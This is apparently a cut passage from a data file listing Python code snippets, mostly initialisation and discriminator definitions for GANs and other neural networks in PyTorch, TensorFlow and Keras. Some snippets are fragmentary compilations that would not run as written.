tf.placeholder_with_default([self.lambda_c],[1],name=\"lambda_c\")\n self.lambda_c = self.lambda_c[0]\n self.lambda_h = tf.placeholder_with_default([self.lambda_h],[1],name=\"lambda_h\")\n self.lambda_h = self.lambda_h[0]\n \n self.dis_real_A = self.disA.create(self.A,False)\n self.dis_real_Ah = self.disA_His.create(self.m_A,False)\n self.dis_real_B = self.disB.create(self.B,False)\n self.dis_real_Bh = self.disB_His.create(self.m_B,False)\n self.dis_fake_A = self.disA.create(self.fake_A,True)\n self.dis_fake_Ah = self.disA_His.create(self.m_fake_A,True)\n self.dis_fake_B = self.disB.create(self.fake_B,True)\n self.dis_fake_Bh = self.disB_His.create(self.m_fake_B,True)\n \n self.cyc_A = self.genA.create(self.fake_B,True)\n self.cyc_B = self.genB.create(self.fake_A,True)\n \n \n # Define cycle loss (eq. 2)\n self.loss_cyc_A = tf.reduce_mean(tf.abs(self.cyc_A-self.A))\n self.loss_cyc_B = tf.reduce_mean(tf.abs(self.cyc_B-self.B))\n \n self.loss_cyc = self.loss_cyc_A + self.loss_cyc_B\n \n # Define discriminator losses (eq. 1)\n self.loss_dis_A = (tf.reduce_mean(tf.square(self.dis_real_A)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_A)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Ah)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Ah)))*0.5*self.lambda_h\n \n \n self.loss_dis_B = (tf.reduce_mean(tf.square(self.dis_real_B)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_B)))*0.5 +\\\n (tf.reduce_mean(tf.square(self.dis_real_Bh)) +\\\n tf.reduce_mean(tf.square(1-self.dis_fake_Bh)))*0.5*self.lambda_h\n \n self.loss_gen_A = tf.reduce_mean(tf.square(self.dis_fake_A)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Ah)) +\\\n self.lambda_c * self.loss_cyc/2.\n self.loss_gen_B = tf.reduce_mean(tf.square(self.dis_fake_B)) +\\\n self.lambda_h * tf.reduce_mean(tf.square(self.dis_fake_Bh)) +\\\n self.lambda_c * self.loss_cyc/2.\n \n # Create the different optimizer\n with self.graph.as_default():\n # Optimizer for Gen\n self.list_gen = []\n for var in tf.trainable_variables():\n if 'gen' in str(var):\n self.list_gen.append(var)\n optimizer_gen = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_gen = optimizer_gen.minimize(self.loss_gen_A+self.loss_gen_B,var_list=self.list_gen)\n \n # Optimizer for Dis\n self.list_dis = []\n for var in tf.trainable_variables():\n if 'dis' in str(var):\n self.list_dis.append(var)\n optimizer_dis = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_dis = optimizer_dis.minimize(self.loss_dis_A + self.loss_dis_B,var_list=self.list_dis)", "def __init__(self, args, normalization_mean, normalization_std,\n style_img, content_img, content_weight=1, style_weight=1000000):\n super(ArtNet, self).__init__()\n\n self.args = args\n\n self.style_img = style_img\n self.content_img = content_img\n\n self.content_layers = ['conv_4']\n self.style_layers = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\n # mean and std used for normalization\n self.normalization_mean = normalization_mean\n self.normalization_std = normalization_std\n\n # weights of content image and style image\n self.content_weight = args.content_weight if args else content_weight\n self.style_weight = args.style_weight if args else style_weight\n\n # initialize vgg19 pre-trained model\n self.model = vgg19(pretrained=True).features.to(device).eval()", "def __init__(self, **kwargs: dict) -> None:\n super(AnimeGAN_v2, self).__init__()\n self.model_name: str = 'animeGAN_v2'\n self.model_version: str = '1.0.0'\n \n self.pretrained_model_path: str = kwargs['pretrained_model_path']\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n torch.set_grad_enabled(False)\n\n self.model = Generator().eval().to(self.device)\n ckpt = torch.load(self.pretrained_model_path, map_location=self.device)\n self.model.load_state_dict(ckpt)", "def __init__(\n self,\n discriminators: Union[BaseDiscriminator, List[BaseDiscriminator]],\n validate: bool = True,\n ):\n super().__init__(validate)\n self._discriminator = discriminators\n self._n_circs = 0\n self._n_shots = 0\n self._n_slots = 0\n self._n_iq = 0", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(2)\n ]\n self.norms = ModuleList(norms_list)", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.cross_attn = MultiheadAttention(**self.cross_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(3)\n ]\n self.norms = ModuleList(norms_list)", "def __init__(self, opt):\n BaseModel.__init__(self, opt)\n # specify the training losses you want to print out. The training/test scripts will call <BaseModel.get_current_losses>\n self.loss_names = ['G_GAN', 'G_L1', 'D_real', 'D_fake']\n # specify the images you want to save/display. The training/test scripts will call <BaseModel.get_current_visuals>\n self.visual_names = ['real_A', 'fake_B', 'real_B']\n # specify the models you want to save to the disk. The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>\n if self.isTrain:\n self.model_names = ['G', 'D']\n else: # during test time, only load G\n self.model_names = ['G']\n\n # Set TPN_enabled to true if opt.TPN is defined\n if opt.TPN:\n self.TPN_enabled = True\n else:\n self.TPN_enabled = False\n\n # Conditional GANs need to take both input and output images; Therefore, #channels for D is input_nc + output_nc\n discr_input_nc = opt.input_nc + opt.output_nc\n\n # If TPN is enabled, switch to the U-Net with TPN architecture\n if self.TPN_enabled:\n opt.netG = 'unet_256_TPN'\n discr_input_nc +=1 # Additional Channel for Time Input\n\n # define networks (both generator and discriminator)\n self.netG = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,\n not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)\n\n if self.isTrain: # define a discriminator; \n self.netD = networks.define_D(discr_input_nc, opt.ndf, opt.netD,\n opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids)\n\n if self.TPN_enabled:\n self.loss_names = ['G_GAN', 'G_L1', 'G_TPN', 'D_real', 'D_fake']\n\n # Store final gamma value and then set it to 0\n self.final_gamma = deepcopy(opt.gamma)\n opt.gamma = 0\n\n # Initiliaze m and c to None\n self.update_m = None\n self.update_c = None\n\n # Setup TPN if set to True\n print(\"\\nSetting up TPN\\n\")\n opt_TPN = deepcopy(opt) # copy train options and change later\n opt_TPN.model = 'time_predictor'\n opt_TPN.name = opt.TPN\n opt_TPN.netD = 'time_input'\n opt_TPN.ndf = 16 # Change depending on the ndf size used with the TPN model specified\n # hard-code some parameters for TPN test phase\n opt_TPN.display_id = -1 # no visdom display;\n opt_TPN.isTrain = False\n print(\"Options TPN: {}\\n\\n\".format(opt_TPN))\n self.TPN = create_model(opt_TPN) # create a model given opt_TPN.model and other options\n self.TPN.setup(opt_TPN) # regular setup: load\n\n if self.isTrain:\n # define loss functions\n self.criterionGAN = networks.GANLoss(opt.gan_mode).to(self.device)\n self.criterionL1 = torch.nn.L1Loss()\n # initialize optimizers; schedulers will be automatically created by function <BaseModel.setup>.\n self.optimizer_G = torch.optim.Adam(self.netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n\n # Check if lambda_L2 is in range [0,1]\n assert (0 <= self.opt.lambda_L2 <= 1)", "def __init__(self, colour, san, nags=[], comment=\"\", variations=[]):\n self.colour = colour\n self.san = san\n self.nags = self.nodes_to_nags(nags)\n self.comment = comment\n self.variations = variations", "def __init__(self, sigma_initializer=RandomNormal(0, 1), spectral_iterations=1,\n fully_diff_spectral=True, stateful=False, renormalize=False, **kwargs):\n super(SNConditionalConv2D, self).__init__(**kwargs)\n self.sigma_initializer = keras.initializers.get(sigma_initializer)\n self.fully_diff_spectral = fully_diff_spectral\n self.spectral_iterations = spectral_iterations\n self.stateful = stateful\n self.renormalize = renormalize", "def __init__(self, nn_architecture, seed=99):\n self.nn_architecture = nn_architecture\n self.seed = seed", "def __init__(self, use_wasserstein=True):\n\n opt = WassersteinCycleGANTestOptions if use_wasserstein else CycleGANTestOptions\n\n opt.checkpoints_dir = os.path.join(\n pathlib.Path(__file__).parent.absolute(), opt.checkpoints_dir\n )\n\n tf_properties = {\n \"load_size\": opt.load_size,\n \"crop_size\": opt.crop_size,\n \"preprocess\": opt.preprocess,\n \"mask\": os.path.join(os.path.dirname(__file__), opt.mask),\n \"no_flip\": True,\n \"grayscale\": True,\n }\n self.transform = get_transform(**tf_properties)\n\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n if opt.is_wgan:\n netg_b_to_a = resnet_generator.ResnetGenerator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n get_norm_layer(opt.norm),\n dilations=opt.dilations,\n conv_layers_in_block=opt.conv_layers_in_block,\n )\n else:\n netg_b_to_a = generator.create_generator(\n opt.input_nc,\n opt.output_nc,\n opt.ngf,\n opt.netg,\n opt.norm,\n not opt.no_dropout,\n opt.activation,\n opt.conv_layers_in_block,\n opt.dilations,\n )\n\n netg_b_to_a = init_net(netg_b_to_a, opt.init_type, opt.init_gain, self.device)\n\n ModelClass = CycleGANModel if not opt.is_wgan else WassersteinCycleGANModel\n\n self.model = ModelClass.from_dict(\n netg_a_to_b=None, netg_b_to_a=netg_b_to_a, **opt.to_dict()\n )\n\n self.model.networks.load(\n os.path.join(opt.checkpoints_dir, opt.name, f\"{opt.epoch}_net_\"),\n device=self.device,\n )\n self.model.eval()", "def discriminator_block(in_filters, out_filters, stride, normalize):\n layers = [nn.Conv2d(in_filters, out_filters, 3, stride, 1)]\n if normalize:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n layers = []\n in_filters = channels\n for out_filters, stride, normalize in [ (64, 2, False),\n (128, 2, True),\n (256, 2, True),\n (512, 1, True)]:\n layers.extend(discriminator_block(in_filters, out_filters, stride, normalize))\n in_filters = out_filters\n\n layers.append(nn.Conv2d(out_filters, 1, 3, 1, 1))\n\n self.model = nn.Sequential(*layers)\n\n \"\"\"CycleGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, normalize=True):\n \"\"\"Returns downsampling layers of each discriminator block\"\"\"\n layers = [nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1)]\n if normalize:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.model = nn.Sequential(\n *discriminator_block(in_channels, 64, normalize=False),\n *discriminator_block(64, 128),\n *discriminator_block(128, 256),\n *discriminator_block(256, 512),\n nn.ZeroPad2d((1, 0, 1, 0)),\n nn.Conv2d(512, 1, 4, padding=1)\n )\n\n \"\"\"DCGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, bn=True):\n block = [ nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25)]\n if bn:\n block.append(nn.BatchNorm2d(out_filters, 0.8))\n return block\n\n self.model = nn.Sequential(\n *discriminator_block(opt.channels, 16, bn=False),\n *discriminator_block(16, 32),\n *discriminator_block(32, 64),\n *discriminator_block(64, 128),\n )\n\n # The height and width of downsampled image\n ds_size = opt.img_size // 2**4\n self.adv_layer = nn.Sequential( nn.Linear(128*ds_size**2, 1),\n nn.Sigmoid())\n\n\n \"\"\"DiscoGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, normalization=True):\n \"\"\"Returns downsampling layers of each discriminator block\"\"\"\n layers = [nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1)]\n if normalization:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.model = nn.Sequential(\n *discriminator_block(in_channels, 64, normalization=False),\n *discriminator_block(64, 128),\n *discriminator_block(128, 256),\n nn.ZeroPad2d((1, 0, 1, 0)),\n nn.Conv2d(256, 1, 4, padding=1)\n )\n\n \"\"\"DraGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, bn=True):\n block = [ nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25)]\n if bn:\n block.append(nn.BatchNorm2d(out_filters, 0.8))\n return block\n\n self.model = nn.Sequential(\n *discriminator_block(opt.channels, 16, bn=False),\n *discriminator_block(16, 32),\n *discriminator_block(32, 64),\n *discriminator_block(64, 128),\n )\n\n # The height and width of downsampled image\n ds_size = opt.img_size // 2**4\n self.adv_layer = nn.Sequential( nn.Linear(128*ds_size**2, 1),\n nn.Sigmoid())\n\n \"\"\"EBGAN\n \"\"\"\n # Upsampling\n self.down = nn.Sequential(\n nn.Conv2d(opt.channels, 64, 3, 2, 1),\n nn.ReLU(),\n )\n # Fully-connected layers\n self.down_size = (opt.img_size // 2)\n down_dim = 64 * (opt.img_size // 2)**2\n\n self.embedding = nn.Linear(down_dim, 32)\n\n self.fc = nn.Sequential(\n nn.BatchNorm1d(32, 0.8),\n nn.ReLU(inplace=True),\n nn.Linear(32, down_dim),\n nn.BatchNorm1d(down_dim),\n nn.ReLU(inplace=True)\n )\n # Upsampling\n self.up = nn.Sequential(\n nn.Upsample(scale_factor=2),\n nn.Conv2d(64, opt.channels, 3, 1, 1)\n )\n\n \"\"\"InfoGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, bn=True):\n \"\"\"Returns layers of each discriminator block\"\"\"\n block = [ nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25)]\n if bn:\n block.append(nn.BatchNorm2d(out_filters, 0.8))\n return block\n\n self.conv_blocks = nn.Sequential(\n *discriminator_block(opt.channels, 16, bn=False),\n *discriminator_block(16, 32),\n *discriminator_block(32, 64),\n *discriminator_block(64, 128),\n )\n\n # The height and width of downsampled image\n ds_size = opt.img_size // 2**4\n\n # Output layers\n self.adv_layer = nn.Sequential(nn.Linear(128*ds_size**2, 1))\n self.aux_layer = nn.Sequential(\n nn.Linear(128*ds_size**2, opt.n_classes),\n nn.Softmax()\n )\n self.latent_layer = nn.Sequential(nn.Linear(128*ds_size**2, opt.code_dim))\n\n \"\"\"LSGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, bn=True):\n block = [ nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25)]\n if bn:\n block.append(nn.BatchNorm2d(out_filters, 0.8))\n return block\n\n self.model = nn.Sequential(\n *discriminator_block(opt.channels, 16, bn=False),\n *discriminator_block(16, 32),\n *discriminator_block(32, 64),\n *discriminator_block(64, 128),\n )\n\n # The height and width of downsampled image\n ds_size = opt.img_size // 2**4\n self.adv_layer = nn.Linear(128*ds_size**2, 1)\n\n \"\"\"Pix2Pix\n \"\"\"\n def discriminator_block(in_filters, out_filters, normalization=True):\n \"\"\"Returns downsampling layers of each discriminator block\"\"\"\n layers = [nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1)]\n if normalization:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.model = nn.Sequential(\n *discriminator_block(in_channels*2, 64, normalization=False),\n *discriminator_block(64, 128),\n *discriminator_block(128, 256),\n *discriminator_block(256, 512),\n nn.ZeroPad2d((1, 0, 1, 0)),\n nn.Conv2d(512, 1, 4, padding=1, bias=False)\n )\n\n \"\"\"Pixelda\n \"\"\"\n def block(in_features, out_features, normalization=True):\n \"\"\"Discriminator block\"\"\"\n layers = [ nn.Conv2d(in_features, out_features, 3, stride=2, padding=1),\n nn.LeakyReLU(0.2, inplace=True) ]\n if normalization:\n layers.append(nn.InstanceNorm2d(out_features))\n return layers\n\n self.model = nn.Sequential(\n *block(opt.channels, 64, normalization=False),\n *block(64, 128),\n *block(128, 256),\n *block(256, 512),\n nn.Conv2d(512, 1, 3, 1, 1))\n\n \"\"\"SRGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, stride, normalize):\n \"\"\"Returns layers of each discriminator block\"\"\"\n layers = [nn.Conv2d(in_filters, out_filters, 3, stride, 1)]\n if normalize:\n layers.append(nn.BatchNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n layers = []\n in_filters = in_channels\n for out_filters, stride, normalize in [ (64, 1, False),\n (64, 2, True),\n (128, 1, True),\n (128, 2, True),\n (256, 1, True),\n (256, 2, True),\n (512, 1, True),\n (512, 2, True),]:\n layers.extend(discriminator_block(in_filters, out_filters, stride, normalize))\n in_filters = out_filters\n\n # Output layer\n layers.append(nn.Conv2d(out_filters, 1, 3, 1, 1))\n\n self.model = nn.Sequential(*layers)\n\n \"\"\"StarGAN\n \"\"\"\n channels, img_size, _ = img_shape\n\n def discriminator_block(in_filters, out_filters):\n \"\"\"Returns downsampling layers of each discriminator block\"\"\"\n layers = [ nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1),\n nn.LeakyReLU(0.01)]\n return layers\n\n layers = discriminator_block(channels, 64)\n curr_dim = 64\n for _ in range(n_strided - 1):\n layers.extend(discriminator_block(curr_dim, curr_dim*2))\n curr_dim *= 2\n\n self.model = nn.Sequential(*layers)\n\n # Output 1: PatchGAN\n self.out1 = nn.Conv2d(curr_dim, 1, 3, padding=1, bias=False)\n # Output 2: Class prediction\n kernel_size = img_size // 2**n_strided\n self.out2 = nn.Conv2d(curr_dim, c_dim, kernel_size, bias=False)\n\n \"\"\"WGAN\n \"\"\"\n nn.Linear(int(np.prod(img_shape)), 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 1)\n\n \n\n\n# import torch.nn as nn\n# import torch\n# from torch.nn.modules import conv, Linear\n# import torch.nn.functional as F\n# from src.snlayers.snconv2d import SNConv2d\n\n# class _netG(nn.Module):\n# def __init__(self, nz, nc, ngf):\n# super(_netG, self).__init__()\n# self.main = nn.Sequential(\n# # input is Z, going into a convolution\n# nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0, bias=True),\n# nn.BatchNorm2d(ngf * 8),\n# nn.ReLU(True),\n# # state size. (ngf*8) x 4 x 4\n# nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=True),\n# nn.BatchNorm2d(ngf * 4),\n# nn.ReLU(True),\n# # state size. (ngf*4) x 8 x 8\n# nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=True),\n# nn.BatchNorm2d(ngf * 2),\n# nn.ReLU(True),\n# # state size. (ngf*2) x 16 x 16\n# nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=True),\n# nn.BatchNorm2d(ngf),\n# nn.ReLU(True),\n# # state size. (ngf) x 32 x 32\n# nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=True),\n# nn.Tanh()\n# # state size. (nc) x 32 x 32\n# )\n\n# def forward(self, input):\n# output = self.main(input)\n# return output\n\n# # Actor\n# class _netE(nn.Module):\n# def __init__(self, nc, ndf):\n# super(_netE, self).__init__()\n\n# self.main = nn.Sequential(\n# SNConv2d(nc, ndf, 7, 4, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf, 3, 7, 4, 1, bias=False),\n# nn.Sigmoid()\n# )\n# def forward(self, input):\n# output = self.main(input) \n# return output.view(-1, 3).squeeze(1)\n\n# class _netD1(nn.Module):\n# def __init__(self, nc, ndf):\n# super(_netD1, self).__init__()\n\n self.main = nn.Sequential(\n SNConv2d(nc, ndf, 5, 2, 2), \n nn.LeakyReLU(0.2, inplace=True),\n SNConv2d(ndf, ndf * 2, 5, 2, 2),\n nn.LeakyReLU(0.2, inplace=True),\n SNConv2d(ndf * 2, ndf * 4, 5, 2, 2),\n nn.LeakyReLU(0.2, inplace=True),\n SNConv2d(ndf * 4, ndf * 8, 5, 2, 2),\n nn.LeakyReLU(0.2, inplace=True),\n SNConv2d(ndf * 8, 1, 4),\n nn.Sigmoid()\n\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(ndf * 4, ndf * 16, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 16),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*16) x 4 x 4\n nn.Conv2d(ndf * 16, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n # )\n # def forward(self, input):\n # output = self.main(input)\n # output = output.view(-1, 1).squeeze(1)\n # return output\n\n# class _netD2(nn.Module):\n# def __init__(self, nc, ndf):\n# super(_netD2, self).__init__()\n\n# self.main = nn.Sequential(\n# SNConv2d(nc, ndf, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf, ndf, 16, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# # ndf x 30 x 30\n\n# SNConv2d(ndf, ndf * 2, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 2, ndf * 2, 16, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# # (ndf * 2) x 9 x 9\n\n# SNConv2d(ndf * 2, ndf * 4, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 4, 1, 9, 1, 0, bias=False),\n# nn.Sigmoid()\n# # 1 x 1 x 1\n# )\n# def forward(self, input):\n# output = self.main(input)\n# return output.view(-1, 1).squeeze(1)\n\n# class _netD3(nn.Module):\n# def __init__(self, nc, ndf):\n# super(_netD3, self).__init__()\n\n# self.main = nn.Sequential(\n# # input is (nc) x 32 x 32\n# SNConv2d(nc, ndf, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf, ndf, 4, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# # state size. (ndf) x 1 x 32\n# SNConv2d(ndf, ndf * 2, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf*2, ndf * 2, 4, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# # state size. (ndf*2) x 16 x 16\n# SNConv2d(ndf * 2, ndf * 4, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 4, ndf * 4, 4, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n\n# SNConv2d(ndf * 4, ndf * 8, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 8, ndf * 8, 4, 2, 1, bias=True),\n\n# # state size. (ndf*8) x 4 x 4\n# SNConv2d(ndf * 8, ndf * 16, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 16, 1, 4, 1, 0, bias=False),\n# nn.Sigmoid()\n# )\n# def forward(self, input):\n# output = self.main(input)\n# output = output.view(-1, 1).squeeze(1)\n# return output\n\n\n# _netD_list = [_netD1]", "def __init__(self):\n super().__init__()\n self.dimensionality = 1\n self.distType = 'Continuous'", "def initialise_network(self):\n raise NotImplementedError", "def train_generator(gan, discriminator, batch_size):\n X = get_noise(batch_size)\n # Label noise as real data meaning as 1.0.\n Y = np.ones(batch_size)\n # Freeze discriminator to train generator only.\n discriminator.trainable = False\n gan.train_on_batch(X, Y)", "def build_discriminator2D_SN(self, model_shape, filters=32, k_size=4, drop=True, rate=0.5, summary=False, model_file=None, name='gan_d_'):\n if (model_file):\n \"\"\"\n Load pretreined model\n \"\"\"\n model = self.utils.build_pretrained_model(model_file)\n if (summary):\n model.summary()\n return model\n else:\n \"\"\"\n Create a Discriminator Model using hyperparameters values defined as follows\n \"\"\"\n n_rows = model_shape[0]\n n_cols = model_shape[1]\n c_dims = model_shape[2]\n\n input_shape = (n_rows, n_cols, c_dims) \n input_layer = Input(shape=input_shape, name=name+'input')\n\n d = self.Conv2D_SN_Block(input_layer, filters, k_size=k_size, name=name+'1') # 30x30x32\n d = self.Conv2D_SN_Block(d, 2*filters, k_size=k_size, name=name+'2') # 15x15x64\n d = self.Conv2D_SN_Block(d, 4*filters, k_size=k_size, name=name+'3') # 8x8x128\n d = self.Conv2D_SN_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'4') # 8x8x256\n\n d = Flatten(name=name+'flatten')(d)\n if drop:\n d = Dropout(rate=rate, name=name+'dropout')(d, training=True)\n logits = DenseSN(1, activation='linear', kernel_initializer='glorot_uniform',\n name=name+'dense_SN')(d) #RandomNormal(stddev=0.02)\n out = Activation('sigmoid', name=name+'sigmoid')(logits)\n\n model = Model(inputs=[input_layer], outputs=[out, logits], name='Discriminator')\n if (summary):\n model.summary()\n return model", "def discriminator(self, inpt, reuse, is_train):\n with tf.variable_scope(\"discriminator\"):\n if reuse:\n tf.get_variable_scope().reuse_variables()\n net = conv2d(x=inpt, num_kernels=self.d_init, name=\"conv1\", activation=lkrelu, padding=\"SAME\",\n alpha=0.02, is_train=is_train, stddv=self.stddv)\n net = conv2d(x=net, num_kernels=self.d_init*2, name=\"conv2\", activation=lkrelu, padding=\"SAME\",\n alpha=0.02, is_train=is_train, stddv=self.stddv)\n net = conv2d(x=net, num_kernels=self.d_init*4, name=\"conv3\", activation=lkrelu, padding=\"SAME\",\n alpha=0.02, is_train=is_train, stddv=self.stddv)\n net = conv2d(x=net, num_kernels=self.d_init*8, name=\"conv4\", activation=lkrelu, padding=\"SAME\",\n alpha=0.02, is_train=is_train, stddv=self.stddv)\n net = dense_layer(x=net, num_neurons=1, name=\"output\", activation=tf.identity, is_train=is_train,\n stddv=self.stddv)\n return net", "def initialize_ai(self):\n\n self.gid, self.genome = constants.genomes_to_run[self.identifier]\n self.genome.fitness = -1\n self.net = neat.nn.FeedForwardNetwork.create(self.genome, constants.conf)\n # self.net = neat.nn.RecurrentNetwork\n # .create(self.genome, constants.conf)", "def __init__(self, input_size, neurons):\n super().__init__()\n self.input_size = input_size\n self.neurons = neurons\n self.params[\"w\"] = np.random.randn(input_size, neurons)\n self.params[\"b\"] = np.random.randn(1, neurons)\n self.grads = {}", "def init_weights(self, pretrained=None):\n if isinstance(pretrained, str):\n logger = get_root_logger()\n load_checkpoint(self, pretrained, strict=False, logger=logger)\n elif pretrained is None:\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001)\n elif isinstance(m, (_BatchNorm, nn.GroupNorm)):\n constant_init(m, 1)\n else:\n raise TypeError('pretrained must be a str or None')", "def init_weights(self, pretrained=None):\n if isinstance(pretrained, str):\n logger = get_root_logger()\n load_checkpoint(self, pretrained, strict=False, logger=logger)\n elif pretrained is None:\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001)\n elif isinstance(m, (_BatchNorm, nn.GroupNorm)):\n constant_init(m, 1)\n else:\n raise TypeError('pretrained must be a str or None')", "def init_weights(self, pretrained=None):\n if isinstance(pretrained, str):\n logger = get_root_logger()\n load_checkpoint(self, pretrained, strict=False, logger=logger)\n elif pretrained is None:\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001)\n elif isinstance(m, (_BatchNorm, nn.GroupNorm)):\n constant_init(m, 1)\n else:\n raise TypeError('pretrained must be a str or None')" ]
